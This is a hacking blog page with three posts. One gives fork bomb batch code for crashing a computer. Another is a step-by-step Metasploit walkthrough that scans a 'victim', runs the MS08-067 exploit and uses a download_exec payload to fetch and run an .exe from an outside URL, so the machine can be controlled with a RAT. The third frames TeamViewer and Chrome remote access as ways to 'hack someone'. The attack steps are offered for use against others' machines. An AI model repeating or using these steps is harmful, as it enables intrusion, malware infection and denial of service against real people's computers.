Sheeraz Hacks Production We Hack For You: computer hacking
Showing posts with label computer hacking. Show all posts
Showing posts with label computer hacking. Show all posts

Wednesday 13 May 2015

Fork Bomb-Crush Computer Very Badly With a Single Notepad File

Posted by Sheeraz Ali 
Fork Bomb-Crush Computer Very Badly With a Single Notepad File
Crush Computer With Notepad File 

Another classic, A fork bomb is the equivalent of a DOS attack on your own system. It aims at depriving the system off it's Random access memory, leaving none for vital functions required to keep the systems running, hence crashing it. Just 5 characters long, the fork bomb is not Deadly to a computer, Just annoying.

As with the previous batch file virus tutorials, all you need to do is open up notepad, type and save the following code as a batch file, that is with extension .bat

%0|%0

(That was it.)
Technically, the above 5 characters are short for the following more comprehensible code :

:s
start %0
goto s

Here, the first line creates a sort of checkpoint called 's'. It can be used to bring the programs pointer to a specific command, as is done here by using 'goto' in the last statement. '%0' is actually the name of the .bat file itself. So every time the loop is run another instance of the same program is called and then both of them run together, to again duplicate themselves.
If that seems too simple to cause any trouble, read on.

Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs are created. After another cycle, each of those two create another two for a total of four same programs. After 10 iterations we have 2^10 = 1024 programs. After 100 iterations we have 2^100 = 1.267 nonillion, a number so big you don't even know what 'nonillion' is (It's 10^30).

Even with today's CPUs and RAMs being in the Giga Range(Ghz and Gb), the first program will probably not even complete 50 iterations before running out of memory. Mind you, every iteration would hardly take a few milliseconds , so running this file will almost definitely crash your computer.

Fork Bomb-Crush Computer Very Badly With a Single Notepad File

How To Hack Computer With IP Address


How To Hack Computer With IP Address
How To Hack Computer With IP Address
Requirements:
Nmap


Metasploit
First of all you need target IP of your victim.
Then open Metasploit Console & type db_create.


[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.


[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>


[This will scan OS, Ports, and Services running on the victim's computer.]


Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.

Now it's time to exploit the victim's machine.


Exploit depends on the OS, Ports, and Services running on the slave's computer.


So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.


No matter whether they are protected by a firewall or not.

Now:

Windows 2000 (all versions SP1, SP2, SP3, SP4)


Windows XP (all versions SP1, SP2, SP3)

Type show exploits


[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi


[Usage: This will select the exploit windows/smb/ms08_067_netapi]


Now Type show targets


[Usage: This will show all targets by exploit]



Now Type set target 0


[Usage: This will set target to 0 specified]


Then type show payloads


[Usage: This will bring up all the payloads]


Next type set payload windows/download_exec



[Usage: This will set the payload as windows/download_exec]



Then Type show options


[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to


Fill only two options RHOST & URL.

Type set RHOST <xxx.xxx.xxx.xxx >


[Usage: This will set RHOST (victim's ip) to xxx.xxx.xxx.xxx]

Next Type set URL http://www.xxxx.com/xxx.exe


[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit


[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)


So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.

In most cases you get a shell!

Now the final question - how to change the shellcode above to get access to someone's 


Windows 7 or 8? 

How To Hack Computer With IP Address

How To Hack Someone Computer 2015

Posted by Sheeraz Ali
Here is tips to Remote Computer Access 2015- Remote Computer Access is a method in computer world by which you can easily control any computer remotely over the internet. This method is mainly made for office managers to have track on their employees that what exactly they are doing on their computer. By this we can easily control each and everything on another computer. Like we can access its all files even we can copy files from one computer to another computer remotely also we can shutdown and can have admin access to that computer. With good internet connection it feel like we are really working on another computer. We can also chat with other pc user With Remote Computer Access. In this post i will tell you the best methods to How To Remotely Access Another Computer 2015


How To Remotely Access Another Computer 2015

How To Hack Someone Computer 2015
How To Hack Someone Computer 2015

#1 Method: Remote Computer Access Using Google Chrome

  1. First Download the extension Chrome Remote Access in your Google Chrome.
  2. Now this app will get added to your chrome and you can see it at rightmost top corner.
  3. Click on it and click continue.
  4. Now it will ask to allow access to data,proceed with allowing access to it.
  5. Now it will ask ou to connect to another computer or share your computer.
  6. Now if you click on share this computer then it will generate a code.
  7. Send the code to the partner by whom you want to accessed your computer. Note that other computer must have same app installed on its computer.
  8. Now your partner will enter he code and your desktop will get share to him exactly same as you can see yours.
By this anyone having access code can access your computer remotely and even you can access someone’s else computer by having access code of it.

#2 Method : Using Team Viewer

Team Viewer is very popular software to access any computer remotely.

Features Of Team Viewer:-

  • Remote Computer Access
  • Text Chatting with partner
  • Video Calling
  • Remote File Transfer
  • Screenshot Capturing
  • Lock computer screen

Steps To Remote Computer Access Using Team Viewer.

  1. Download and install Team Viewer software in your computer. Your computer must be connected to internet.
  2. Now it will display User Id and Password.
  3. If you want your partner to access your computer then send him your user id and password.
  4. If ou want to access someone’s computer then get the Username and pasword of Team Viewer of that computer.
  5. Now click on Connect To partner and type User Id of partner and then it will ask for password.
  6. Fill in the password and press enter.
  7. Now it will start connecting your computer to another computer and finally you can remotely access any computer.
By this method you can easily have remote access over other computer.
How To Remotely Access Another Computer 2015 – So these were the methods to have Remote Computer Access 2015. By connecting remotely you can control your friend’s,employee and any of other’s computer and can even solve their problems by just siiting in front of your computer. You can also have Text Chatting and Video Calling by these methods.

How To Hack Someone Computer 2015

download free facebook hacking software

Most Trending

Real Time Analytics